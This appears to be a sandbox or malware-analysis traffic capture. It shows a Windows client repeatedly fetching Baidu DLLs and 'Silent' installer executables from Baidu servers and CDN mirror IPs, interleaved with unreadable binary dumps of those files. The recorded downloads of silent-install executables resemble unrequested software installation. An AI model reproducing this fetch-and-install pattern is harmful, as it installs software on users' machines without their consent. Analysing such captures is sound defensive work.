User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.51/dl1sw.baidu.com/client/new_v1196/0409/Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe?wsiphost=local

GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dlsw.baidu.com

Range: bytes=524288-

Referer: hXXp://dlsw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.1 206 Partial Content

Server: JSP2/1.0.26

Date: Fri, 11 Apr 2014 04:45:26 GMT

Content-Type: application/x-msdownload

Connection: close

Content-Length: 683232

Content-Range: bytes 524288-1207519/1207520

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length

Accept-Ranges: bytes

Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT

Expires: Sat, 12 Apr 2014 07:20:45 GMT

x-bs-version: A65F70E089635AE47A1E2AED4F13B889

ETag: 30cbc602ada7cdfb0346038c05996d84

x-bs-request-id: MTAuMjE1LjEzMi4yMzo4MDgwOjE1NjY4NjcxMTA6MDkvQXByLzIwMTQgMTU6MjA6NDUg

x-bs-meta-crc32: 2965621797

Content-MD5: 30cbc602ada7cdfb0346038c05996d84

x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
...|$..|$........K...t..C. ....;.r.......|$..S.9t..tX..u.......|$..v.;
w.u.......|$.;w.u.......D$H..;N.r.;w.u..z....V..D$H;.......;w.u..a....
6.L$H.V.Q.L$.RV...t$0......L$.j.....X...|$...~..G..8u..%....F.;C..D$$u
.......|$..d$..O...t..G. ....;.r.......O.9t..uC..t..G. ....;.r........
.G..T$$....T..t.......D$D.8.p..@.._^][..0....D$D.L$$_^]...H..@..[..0..
[email protected][email protected][email protected].......^......QV...F...t..L$..V.QV
RP..|...F.P.........F......F......F.....^Y..j.h....d.....P...VW..v..3.
P.D$.d........t$..~.........G.3..G..D$ .G..D$..D$.Pj..N..|$..5........
.F .F$...L$.d......Y_^..........V.t$.;.Wt..|$(W.\V..)~..D$..P..L$$...q
..T$....r....r..y..z..P..Q._.p.^.$........j.h ...d.....P...VW..v..3.P.
D$.d........t$..D$(.....~.........G.3..G..T$..D$ .G.Rj..N..D$..|$.....
.......F .F$...L$.d......Y_^..................j.h[...d.....P...VW..v..
3.P.D$.d........t$..D$(.....~....C....G.3..G..T$..D$ .G.Rj..N..D$..|$.
...........F .F$...L$.d......Y_^..................j.h....d.....P...VW.
.v..3.P.D$.d........t$..~.........G.3..G..D$ .G..D$..D$.Pj..N..|$..U..
.......F .F$...L$.d......Y_^..........j.h....d.....P...VW..v..3.P.D$.d
........t$..~.........G.3..G..D$ .G..D$..D$.Pj..N..|$............F .F$
...L$.d......Y_^..........j.h....d.....P...VW..v..3.P.D$.d........t$..
~.........G.3..G..D$ .G..D$..D$.Pj..N..|$............F .F$...L$.d.....
.Y_^..........j.h....d.....P...VW..v..3.P.D$.d........t$..~.........G.
3..G..D$ .G..D$..D$.Pj..N..|$............F .F$...L$.d......Y_^........
..SU.l$...V..t.;l$.t.......\$..D$ ;.t%.N.WSQP.0....T$ R...F.VPW.^x
<<< skipped >>>

GET /dl1sw.baidu.com/client/dllqq/BDLogicUtils.dll?wsiphost=local HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: 117.21.189.50

Range: bytes=720896-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 206 Partial Content

Expires: Thu, 24 Apr 2014 09:30:27 GMT

Date: Tue, 25 Mar 2014 09:30:27 GMT

Server: nginx

Content-Type: application/octet-stream

Last-Modified: Tue, 18 Mar 2014 11:58:16 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Content-Range: bytes 720896-926535/926536

Content-Length: 205640

Age: 1451690

Via: 1.0 fjpt155:80 (Cdn Cache Server V2.0), 1.0 jxjj50:25001 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Disposition: attachment;filename="BDLogicUtils.dll"
......................................................................
......................................................................
......................................................................
...... !"#$%&'()* ,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxy
z[\]^_`abcdefghijklmnopqrstuvwxyz{|}~.................................
......................................................................
......................................................................
......................................................................
.............................................. !"#$%&'()* ,-./01234567
89:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVW
XYZ{|}~...............................................................
..................................................................LC_T
IME.LC_NUMERIC..LC_MONETARY.LC_CTYPE....LC_COLLATE..LC_ALL..p.........
[email protected]...............
....................... !"#$%&'()* ,-./0123456789:;<=>?@ABCDEFGH
IJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~.._.,....._...;.
..=...=;..Visual C   CRT: Not enough memory to complete call to strerr
or...mixcrt.EncodePointer...KERNEL32.DLL....DecodePointer...FlsFree.Fl
sSetValue.FlsGetValue.FlsAlloc....runtime error ......TLOSS error.....
SING error......DOMAIN error....R6034..An application has made an atte
mpt to load the C runtime library incorrectly..Please contact the appl
ication's support team for more information.........R6033..- Attem
<<< skipped >>>

GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dlsw.baidu.com

Range: bytes=163840-

Referer: hXXp://dlsw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.1 206 Partial Content

Server: JSP2/1.0.26

Date: Fri, 11 Apr 2014 04:45:39 GMT

Content-Type: application/x-msdownload

Connection: close

Content-Length: 1043680

Content-Range: bytes 163840-1207519/1207520

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length

Accept-Ranges: bytes

Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT

Expires: Sat, 12 Apr 2014 07:20:45 GMT

x-bs-version: A65F70E089635AE47A1E2AED4F13B889

ETag: 30cbc602ada7cdfb0346038c05996d84

x-bs-request-id: MTAuMjE1LjEzMi4yMzo4MDgwOjE1NjY4NjcxMTA6MDkvQXByLzIwMTQgMTU6MjA6NDUg

x-bs-meta-crc32: 2965621797

Content-MD5: 30cbc602ada7cdfb0346038c05996d84

x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
\.. .....}&.....M..|8....].#\.D.\.D..u3.M..].!..,.O....M.........|8...
!....].u..]..M.!K....]..}...J..z..y..J..z..y........M.....y..J..z..Q..
J..Q..J.;J.u^.L...M..... .L..}#.}..u...........;..........M..|.D.).}..
u..N.........{..M.........N.........7.M...t....L.....M..u....N....L2..
u......y..>u.;. ...u..M.;.....u..% .....M....B._^[...`.....d....SUV
.t$.......3.;.Wto=.v..th......;.t^9(uZ......;.t.9(u.P.Xn..........M..Y
Y......;.t.9(u.P.7n..........K..YY........n..........n..YY......;.tD9(
[email protected]............. .P..m........ .P..m..........m.........
[email protected]..~P[...p}..t...;.t.9(u.P..m..Y9o.t
..G.;.t.9(u.P.hm..Y...Ku.V.[m..Y_^][.SUV.t$.W.=(a..V..........t.P.....
.....t.P..........t.P..........t.P..j..^P].{.p}..t.....t.P...{..t..C..
.t.P.....Mu............P.._^][.V.t$...t.SUW.=$a..V..........t.P.......
...t.P..........t.P..........t.P..j..^P].{.p}..t.....t.P...{..t..C...t
.P.....Mu............P.._][..^.V....t...t.;.t.Wj6Y..... .P.....Y_^...t
7..t3V.0;.t(W.8.......Yt.V......>.Yu...x}..t.V.T...Y..^.3..j.h`....
............l}...Fpt".~l.t.......pl..u.j .....Y........j......Y.e...Fl
.=P~...i....E..E............j......Y.u..VW......Hp.........BB...T$....
t:3.;.t;...t'...t..3...VVVVV........i...................Hp....l}....._
^[email protected]~......................$w..........4
...............j.h..........u.3.;.to.F.;.t.P..$a....u..F.=X...t.P.{j..
Y9>t7j......Y.}..6.....Y..;.t.98u.=x}..t.P.....Y.E.................
.F.V./j..Y.......u.j..c...Y..e...j.h.....*....>.....j.j..9...YY
<<< skipped >>>

GET /dl1sw.baidu.com/client/new_v1196/0409/Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe?wsiphost=local HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: 117.21.189.55

Range: bytes=8126464-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

GET /dl1sw.baidu.com/client/new_v1196/0409/Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe?wsiphost=local HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: 117.21.189.55

Range: bytes=8126464-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 206 Partial Content

Expires: Sun, 11 May 2014 04:40:07 GMT

Date: Fri, 11 Apr 2014 04:40:07 GMT

Server: nginx

Content-Type: application/octet-stream

Last-Modified: Tue, 08 Apr 2014 22:03:37 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Content-Range: bytes 8126464-30451943/30451944

Content-Length: 22325480

Age: 346

Via: 1.0 fjqz158:80 (Cdn Cache Server V2.0), 1.0 jxjj55:10001 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Disposition: attachment;filename="Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe"
HTTP/1.0 206 Partial Content..Expires: Sun, 11 May 2014 04:40:07 GMT..
Date: Fri, 11 Apr 2014 04:40:07 GMT..Server: nginx..Content-Type: appl
ication/octet-stream..Last-Modified: Tue, 08 Apr 2014 22:03:37 GMT..Ca
che-Control: max-age=2592000..Accept-Ranges: bytes..Content-Range: byt
es 8126464-30451943/30451944..Content-Length: 22325480..Age: 346..Via:
 1.0 fjqz158:80 (Cdn Cache Server V2.0), 1.0 jxjj55:10001 (Cdn Cache S
erver V2.0)..Connection: keep-alive..Content-Disposition: attachment;f
ilename="Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe"..HTTP
/1.0 206 Partial Content..Expires: Sun, 11 May 2014 04:40:07 GMT..Date
: Fri, 11 Apr 2014 04:40:07 GMT..Server: nginx..Content-Type: applicat
ion/octet-stream..Last-Modified: Tue, 08 Apr 2014 22:03:37 GMT..Cache-
Control: max-age=2592000..Accept-Ranges: bytes..Content-Range: bytes 8
126464-30451943/30451944..Content-Length: 22325480..Age: 346..Via: 1.0
 fjqz158:80 (Cdn Cache Server V2.0), 1.0 jxjj55:10001 (Cdn Cache Serve
r V2.0)..Connection: keep-alive..Content-Disposition: attachment;filen
ame="Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe"..
<<< skipped >>>

GET /client1/common/patch/16101830722/BDMNet.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.50/dl1sw.baidu.com/client1/common/patch/16101830722/BDMNet.dll?wsiphost=local

GET /client1/common/patch/16101830722/BDMNet.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=655360-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.57/dl1sw.baidu.com/client1/common/patch/16101830722/BDMNet.dll?wsiphost=local

GET /client/new_v1196/0409/Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=9043968-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.51/dl1sw.baidu.com/client/new_v1196/0409/Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe?wsiphost=local

GET /client1/common/patch/16101830722/BDMNet.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=983040-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.53/dl1sw.baidu.com/client1/common/patch/16101830722/BDMNet.dll?wsiphost=local

GET /client1/common/patch/16101830722/BDMNet.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=884736-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.50/dl1sw.baidu.com/client1/common/patch/16101830722/BDMNet.dll?wsiphost=local

GET /client1/common/patch/16101830722/BDMNet.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=1114112-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.56/dl1sw.baidu.com/client1/common/patch/16101830722/BDMNet.dll?wsiphost=local

GET /client1/common/patch/16101830722/BDMNet.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=786432-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

GET /client1/common/patch/16101830722/BDMNet.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=786432-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.56/dl1sw.baidu.com/client1/common/patch/16101830722/BDMNet.dll?wsiphost=local

GET /dl1sw.baidu.com/client/new_v1196/0409/Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe?wsiphost=local HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: 117.21.189.55

Range: bytes=15335424-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 206 Partial Content

Expires: Sun, 11 May 2014 04:40:07 GMT

Date: Fri, 11 Apr 2014 04:40:07 GMT

Server: nginx

Content-Type: application/octet-stream

Last-Modified: Tue, 08 Apr 2014 22:03:37 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Content-Range: bytes 15335424-30451943/30451944

Content-Length: 15116520

Age: 335

Via: 1.0 fjqz158:80 (Cdn Cache Server V2.0), 1.0 jxjj55:10001 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Disposition: attachment;filename="Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe"
N.K..SK.b.../G......J.....Y........Yd...>=.bA......x...[,.{C.v...W.
..._...oi...........#.-..E.Y.~........h.u.!..Y......A....w....... L]{.
......1r..(.>....-G...z..Y...k1...S.\V&..dl.h...aXR.g[4.k.)...4...s
.t.r....^L...T.......&...a.:.s(X..$.1y..$......q=4../.....P.C=exW].J0.
=..q.,[.._.|.....de)....B..v...A...A.5..~...?....wW...3..vH$s......o..
[email protected].[).!HY.`.........}...3.n.
._....O.(,.....4'..cr.aJ..1... {;.....Z9f.v.._....h...kd.:....,q'..6..
....^.Z....y.^.s..E...u...~T..f)x!..3,......u=..)...t..Q.h....e.gm...)
[email protected].%.a.....v......L9B..G...LY..(.].F"k.. ...9
)....."K.??...t...?.?.....u..g......1.)..On.....:-..Xl..D5i..n..0..qjU
?.$`75o.....YO:.Y........ATNV...?.6 ? !..:.....4E.M1}....B.3...#;8....
....a.o..~.3..pg....f......A..QW..j'......t.... !:.C....h.........(..(
...7e.uI.=......f....Q..^...B*........D....U....C.0...X.l0../9.e......
..#...[...Sk...'._..A...^....'/4*9....z.{....U-...{3.Q;.......a...auQN
Q....-.2..6....^$...&.V..`am.......nI............1Q.n.]..L._\.$U1.R..Y
m7..N...'..St....r..b.).J.^..vES....G..~.c....=..g.3...?d..Npg..W|....
....Xz.3\"..6k..Q.4....EN..$..kD4F....B..N.^....r...^..../=..)...7..J=
.r#.`u.\.uV!.gAQm..q>...E"E...zE....q.5....X{..B..x..=..[..,a....N.
4..6...L.2L..)[email protected]..........?D..=.t..^.K...J..$.... .l.?......
S...yUQn....Hg\K.... *..{...B..a.c...0..x..s..J..].....5]v_...D.......
.&.lA.-.[./.M........Y.L. 9.......n9B{\8M..:.U...e.....~...t.\.IF.....
.^.!..^.I...QJ.u.....r...w"...T.xd.2Ve'm%0\L|....-<P.JW8..^..z.
<<< skipped >>>

GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dlsw.baidu.com

Range: bytes=786432-

Referer: hXXp://dlsw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.1 206 Partial Content

Server: JSP2/1.0.26

Date: Fri, 11 Apr 2014 04:45:41 GMT

Content-Type: application/x-msdownload

Connection: close

Content-Length: 421088

Content-Range: bytes 786432-1207519/1207520

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length

Accept-Ranges: bytes

Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT

Expires: Sat, 12 Apr 2014 07:20:45 GMT

x-bs-version: A65F70E089635AE47A1E2AED4F13B889

ETag: 30cbc602ada7cdfb0346038c05996d84

x-bs-request-id: MTAuMjE1LjEzMi4yMzo4MDgwOjE1NjY4NjcxMTA6MDkvQXByLzIwMTQgMTU6MjA6NDUg

x-bs-meta-crc32: 2965621797

Content-MD5: 30cbc602ada7cdfb0346038c05996d84

x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
....D$...t.P.........L$$d......Y_^][............j.hg>..d.....P.....
...v..3...$....SUVW..v..3.P..$....d.......$4.....$<.....$,...3..\$.
.p..4.p.............$0....l$........$......x...1u...$8...WP......R....
PR.V,..P..$....P..g.....P....$(..............$......B...O....x...1u...
$8...WPR..........P.F0R..RP.L$xQ.Yh.....P....$(.............L$p.zB....
....p.....1u...$8...WPR..........P.F4R..P.L$ Q..^.....P....$(........?
....L$..&B........x...1u...$8...WPR..........P.F8R..RP.L$@Q.._.....P..
..$(.............L$8..A...U....x...1u...$8...WPR..........P.F<R...\
$.Q.D$..L$X..$Q.Uh.....P....$(.............L$T.vA........x...1u...$8..
.WPR..........P.F@R.......$......$Q.{g.....P....$(........5.....$.....
.A.........$..........$......$.....x...1..$......$$.......Uu...$<..
.UPR..........P.FTR...l$.h.............8_.Vt)..$....Q. d.....P....$(..
.........$.....'..$....R.Gc.....P....$([email protected].
[email protected]..$8...WP......R.....tg..u..lg..P..
.C........PR.VD.....tg..u..lg..P...!....f.x...1u...$8...WP......R....P
[email protected]...$8...SP......R....SPR.VP..UP....
.....$....d......Y_^][..$....3................I.........[......._.....
..............*...........L$.3...$.D$..D$..D$..D$.PQ.L$...............
V...~..Wt..|$...W.........t..~..u.3.8....._...^..._2.^..........j.h.&g
t;[email protected]$Td......D$d.D$.3....D$..D$\...I.3.j......
h|w...L$@.\$X.D$T.D$D...<...L$...T$<.....9D$P.D$\.s..T$<.u(.|
$L;...r...9E,r..E....E.QRP.{........u.;.r.;......tuj.hL....L$$.\$&
<<< skipped >>>

GET /dl1sw.baidu.com/client/dllqq/BDLogicUtils.dll?wsiphost=local HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: 117.21.189.50

Range: bytes=425984-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 206 Partial Content

Expires: Thu, 24 Apr 2014 09:30:27 GMT

Date: Tue, 25 Mar 2014 09:30:27 GMT

Server: nginx

Content-Type: application/octet-stream

Last-Modified: Tue, 18 Mar 2014 11:58:16 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Content-Range: bytes 425984-926535/926536

Content-Length: 500552

Age: 1451693

Via: 1.0 fjpt155:80 (Cdn Cache Server V2.0), 1.0 jxjj50:25001 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Disposition: attachment;filename="BDLogicUtils.dll"
..*...D$....$8.......t...$.....r...$....P.t........$....@;....$.......
...$......$.....D$.4;.....L$ .L$$..$8......%...N...$.....D$..T$$.D$(.A
LUP.L$,[email protected]....?W..$....h.H..R.c...h.H..P.D$LP..$P......
.....$....QP.T$tR..$\...........$.N.P.F.j....PQ....$H..............9t$
lr..T$XR.}......9t$P......|$l.\$h.\$Xr..D$<P.Y......9.$.....|$P.\$L
.\$<r...$....Q.4.......L$$..$8..........L$...$8......#..9.$......$8
....r...$....R..........$......$......$......$.....[...;...$8.......t.
.E...j.....2.............$(.....$$.....$......$....P....$<.....I%..
....L$0W..S..j.S..$....Q............9.$(...r...$....R.A.......L$$..$(.
....$$.....$......$8..........L$...$8......"..9.$......$8....r...$....
P..........$......$......$......$.....S...;...$8.......t..U...j.......
..$0...d......Y_^][..$....3........(...................j.h....d.....P.
..........3...$....SUVW.....3.P..$....d.......$......$.......O....X9..
.......l$...4....$......F..PT........t{[email protected]..$..
..hLL..P.H...h.>..P..$....Q..$................P....$......w.....$p.
.....i9...L$|.`9......................P8.@<....r|.......sh...W..$..
..hLL..P.....h.>..P..$....Q..$.........d......P....$............$..
......8....$......8.........UQR.W.R...............W..$....h L..P.G...h
.>..P..$d...Q..$................P....$......v.....$P......h8....$..
...\8..........F..PT...............P0.@4=....rnw......ve...W..$(...h.K
..R.....h.>..P..$....P..$.........W......P....$............$.......
.7....$$.....7......UQPR.O.Q...........$....d......Y_^][..$....3..
<<< skipped >>>

GET /client/dllqq/BDLogicUtils.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=720896-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.50/dl1sw.baidu.com/client/dllqq/BDLogicUtils.dll?wsiphost=local

GET /dl1sw.baidu.com/client/dllqq/BDLogicUtils.dll?wsiphost=local HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: 117.21.189.50

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 200 OK

Expires: Thu, 24 Apr 2014 09:30:27 GMT

Date: Tue, 25 Mar 2014 09:30:27 GMT

Server: nginx

Content-Type: application/octet-stream

Content-Length: 926536

Last-Modified: Tue, 18 Mar 2014 11:58:16 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Age: 1451688

Via: 1.0 fjpt155:80 (Cdn Cache Server V2.0), 1.0 jxjj50:25001 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Disposition: attachment;filename="BDLogicUtils.dll"
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......V.h.........
......x.....5.{.....5.k.......Y.......[.............5.h.f...5.t.C...5.
|.....5.z.............5.~.....Rich............................PE..L...
.. S...........!.........0.......6....................................
... .......................................................P..........
........H#...`..hw..@...............................@...@.............
...............................text...x........................... ..`
.rdata..............................@[email protected]...(j.......P............
[email protected].........@....... [email protected]......
.0..............@[email protected]....`.......@[email protected]..........
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>

GET /client/new_w1154/0403/BaiduAn_Setup_1.0.546.32_Sid_555555_Silent.exe HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=7733248-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.53/dl1sw.baidu.com/client/new_w1154/0403/BaiduAn_Setup_1.0.546.32_Sid_555555_Silent.exe?wsiphost=local

GET /client/new_v1196/0409/Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=22937600-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.51/dl1sw.baidu.com/client/new_v1196/0409/Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe?wsiphost=local

GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dlsw.baidu.com

Range: bytes=884736-

Referer: hXXp://dlsw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.1 206 Partial Content

Server: JSP2/1.0.26

Date: Fri, 11 Apr 2014 04:45:27 GMT

Content-Type: application/x-msdownload

Connection: close

Content-Length: 322784

Content-Range: bytes 884736-1207519/1207520

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length

Accept-Ranges: bytes

